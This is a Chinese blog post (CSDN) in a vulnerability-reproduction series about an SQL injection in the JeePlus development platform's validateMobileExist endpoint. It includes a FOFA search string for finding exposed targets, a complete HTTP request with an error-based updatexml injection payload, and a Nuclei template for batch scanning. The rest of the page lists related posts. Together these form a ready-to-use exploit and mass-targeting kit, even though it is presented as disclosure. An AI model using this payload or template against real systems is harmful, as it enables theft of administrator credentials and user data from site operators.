JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞

已于 2024-03-13 13:47:22 修改
阅读量602 收藏 9
点赞数 13
分类专栏: 漏洞复现 文章标签: sql 数据库 网络安全 web安全
于 2024-03-13 13:41:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37284805/article/details/136677816
版权

漏洞描述

JeePlus快速开发平台validateMobile接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

资产测绘

FOFA:app="JeePlus"

利用POC:

GET /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+version%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: jeeplus.session.id=0c7c1b95a1884f668641af07a5bfde93
Upgrade-Insecure-Requests: 1

Nuclei批量检测:

id: template-id
info:
  name: Template Name
  author: xxxx
  severity: info
  description: description
  reference:
    - https://
  tags: tags
http:
  - raw:
      - |+
        GET /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+version%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: jeeplus.session.id=0c7c1b95a1884f668641af07a5bfde93
        Upgrade-Insecure-Requests: 1

    matchers:
      - type: word
        part: body
        words:
          - apper/xml/UserMappe
云瀚安行
关注
  • 13
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
JeePlus快速开发平台validateMobile、validateMobileExist接口SQL注入漏洞
weixin_43567873的博客
03-10 68
JeePlus快速开发平台validateMobile、validateMobileExist接口SQL注入漏洞
Jeeplus快速开发平台 validateMobileExist SQL注入漏洞
0xSec
02-20 512
JeePlus快速开发平台validateMobileExist 接口存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞
2301_77033340的博客
04-15 809
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
2301_77033340的博客
04-15 295
【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
JeePlus低代码开发平台存在SQL注入漏洞
qq_36334672的博客
03-06 541
JeePlus低代码开发平台存在SQL注入漏洞
记一次曲折的获取权限
m0_60571990的博客
12-10 826
记一次曲折的获取权限
JeeSpringCloud uploadFile.jsp 文件上传漏洞复现
0xSec
11-28 901
JeeSpringCloud 是一款免费开源的 Java 互联网云快速开发平台。JeeSpringCloud 访问 /static/uploadify/uploadFile.jsp 可上传任意文件,并可通过 uploadPath 参数指定文件上传路径,导致服务器被控制。
JeePlus快速开发平台 validateMobile SQL注入漏洞复现
0xSec
02-20 514
JeePlus快速开发平台validateMobile 接口存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
jeeplus带工作流开发框架ani.zip
09-01
jeeplus开发框架ani带工作流。可完整运行通过。仅限研究学习使用。 jeeplus开发框架ani带工作流。可完整运行通过。仅限研究学习使用。
Jeeplus使用文档
02-09
帮助你快速使用jeeplus,及jeeplus平台介绍、标签使用、内置组件,代码生成等。
Jeeplus源码-内置组件讲解
11-03
该资源介绍了jeeplus中内置组件的结构,用户管理组件,字典组件,文件上传组件,以及权限管理组件的内容和API的说明。
快速开发框架
04-26
应boss要求,需要开发一个支持Excel文档的解析生成的App,到后面夭折了。就分享出来了。目前支持Excel2003,也就是xls格式的文件的解析,比较完善。支持文件的重命名,支持单元格的合并,样式的设置。文件解析完成...
JAVA企业快速通用开发平台框架源码(基于Bootstrap的Java企业通用开发平台框架)+部署文档及视频[请勿商用]
03-31
JAVA企业快速通用开发平台框架源码+部署文档及视频[请勿商用] 框架为SSM+Bootstrap + mysql数据
CMS建站平台Java版-Jeeplus cms
mhlywxl的博客
10-11 958
本章主要介绍Java版的CMS建站平台Jeeplus Cms,众所周知,市面上的CMS平台基本上都是php语言,漏洞比较多,基本上不维护,而且php语言已经相对落后;相比而言Java版的修改灵活方便,可拓展性强,性价比高一、平台特点cms建站神器可以同时管理维护多个网站可定制不同主题模板,基于freemarker语法更友好的交互体验,内容发布实时展示灵活的建站设置,支持多种类型的网站网站类型多样化,不同主题随意切换面向全屏幕尺寸的响应式适配能力后台基于Java框架,方便集群和性能调优。
PostgreSQL的视图pg_class
lee_vincent1的博客
06-02 1118
在 PostgreSQL 中,pg_class是一个系统目录表,用于存储所有关系(如表、索引、视图、序列等)的元数据。pg_class是数据库系统的重要组成部分,包含了关于每个关系的具体信息。pg_class。
一条sql的执行流程
最新发布
Tsbug的博客
06-04 292
文章地址。
SQL Developer 导入CSV数据
In-Memory Computing Technology
06-03 415
总览,表名那有个显示上的bug,Table.HR.null应该为Table.HR.CSV_DATA。,确实是标准的CSV(comma separated values)。本文是类似的,只不过使用的是官方提供的。
sql运行环境搭建与sqlite插件安装指南
博客
06-04 45
首先,你需要安装一个SQL运行环境,比如MySQL或者Oracle。这里以MySQL为例。SQLite是一个轻量级的数据库引擎,非常适合在本地环境中进行开发和测试。至此,你已经成功搭建了SQL运行环境并安装了SQLite插件。SQL入门01 运行环境搭建与Sqlite插件安装指南。
jeeplus新手教程
08-12
当然,我可以为您提供关于JeePlus的新手教程。JeePlus是一个基于Java的开源框架,用于快速开发企业级Java应用程序。它提供了许多便捷的功能和工具,可以简化开发过程,并提高开发效率。 以下是一个简单的JeePlus新手教程的大纲: 1. 环境设置: - 安装Java开发工具包(JDK)和集成开发环境(IDE),例如Eclipse或IntelliJ IDEA。 - 下载JeePlus框架,并导入到IDE中。 2. 创建新项目: - 在IDE中创建一个新的Java项目。 - 将JeePlus框架添加到项目的依赖中。 3. 数据库配置: - 配置数据库连接,包括数据库驱动程序和连接URL。 - 创建数据库表格或使用现有表格。 4. 实体类和数据访问对象(DAO): - 创建Java实体类,映射到数据库表格。 - 创建DAO类,用于对实体类进行数据库操作,例如增删改查。 5. 业务逻辑层: - 创建服务类,实现业务逻辑。 - 在服务类中调用DAO类来操作数据库。 6. 控制器层: - 创建控制器类,处理用户请求。 - 使用注解来映射URL和方法,处理HTTP请求和响应。 7. 视图层: - 创建JSP页面,用于显示数据和与用户交互。 - 使用JSTL(JavaServer Pages标准标签库)和EL(表达式语言)来处理页面逻辑和显示数据。 8. 测试和调试: - 编写单元测试用例,确保代码的正确性。 - 使用调试工具来调试代码并解决错误。 这只是一个简单的JeePlus新手教程大纲,涵盖了基本的项目搭建和开发流程。当然,JeePlus框架还有更多高级功能和特性,您可以根据需要深入学习和应用。希望对您有所帮助!如果您有任何具体的问题,可以随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值